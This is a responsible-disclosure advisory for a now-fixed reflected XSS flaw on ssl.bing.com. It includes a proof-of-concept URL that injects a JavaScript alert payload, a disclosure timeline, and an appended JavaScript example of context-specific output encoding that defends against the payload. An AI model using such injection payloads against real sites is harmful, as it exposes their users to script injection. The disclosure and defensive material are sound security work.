Advisory: ssl.bing.com - Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-012
Author: Stefan Schurtz
Affected Software: Successfully tested on ssl.bing.com
Vendor URL: http://www.microsoft.com
Vendor Status: fixed

==========================
Vulnerability Description
==========================

The website 'ssl.bing.com' is prone to a Cross-site Scripting vulnerability

==========================
PoC-Exploit
==========================

https://ssl.bing.com/webmaster/home/mysites?orde=1&url=http%3A%2F%2Fstefanschurtz.de%2Ff5018%27-alert%28document.domain%29-%27207aac89df6

==========================
Disclosure Timeline
==========================

29-Dec-2013 - informed Microsoft Security Response Center
30-Dec-2013 - feedback from Microsoft Security Response Center
31-Dec-2013 - status update from Microsoft Security Response Center
03-Jan-2014 - status update from Microsoft Security Response Center
24-Jan-2014 - informed by MSRC about fix

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.microsoft.com
http://www.darksecurity.de/advisories/2013/SSCHADV2013-012.txt
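
Added example, not part of the original advisory and not Microsoft's code: the PoC's 'url' parameter decodes to a value carrying '-alert(document.domain)-', a shape that only matters if the value lands inside a single-quoted JavaScript string. The advisory does not name the sink, so renderUnsafe() below is an assumed, hypothetical template; escapeForJsString() shows the context-specific output encoding that keeps the same input inert.

```javascript
// Query string copied from the advisory's PoC URL.
const POC_QUERY =
  "orde=1&url=http%3A%2F%2Fstefanschurtz.de%2Ff5018%27-alert%28document.domain%29-%27207aac89df6";

// Decode one query parameter the way a web framework would before templating.
function getParam(query, name) {
  return new URLSearchParams(query).get(name);
}

// ASSUMED sink (hypothetical, not from the advisory): the value is concatenated
// into a single-quoted JavaScript string literal without output encoding.
function renderUnsafe(value) {
  return "var siteUrl = '" + value + "';";
}

// Output encoding for the JavaScript-string context: every UTF-16 code unit
// that is not ASCII alphanumeric becomes \uXXXX, so quotes, backslashes,
// line terminators and "</script>" cannot end the literal or the script block.
function escapeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

function renderSafe(value) {
  return "var siteUrl = '" + escapeForJsString(value) + "';";
}

// Evaluate the encoded statement and return the string the page script
// would see. Only call this on renderSafe() output.
function roundTrip(value) {
  return new Function(renderSafe(value) + " return siteUrl;")();
}

const decoded = getParam(POC_QUERY, "url");
console.log(renderUnsafe(decoded)); // literal is closed early by the decoded quote
console.log(renderSafe(decoded));   // a single inert string literal
console.log(roundTrip(decoded) === decoded); // the data itself is preserved
```

HTML-entity encoding alone is not the right control for this context; the encoder has to match where the value is written.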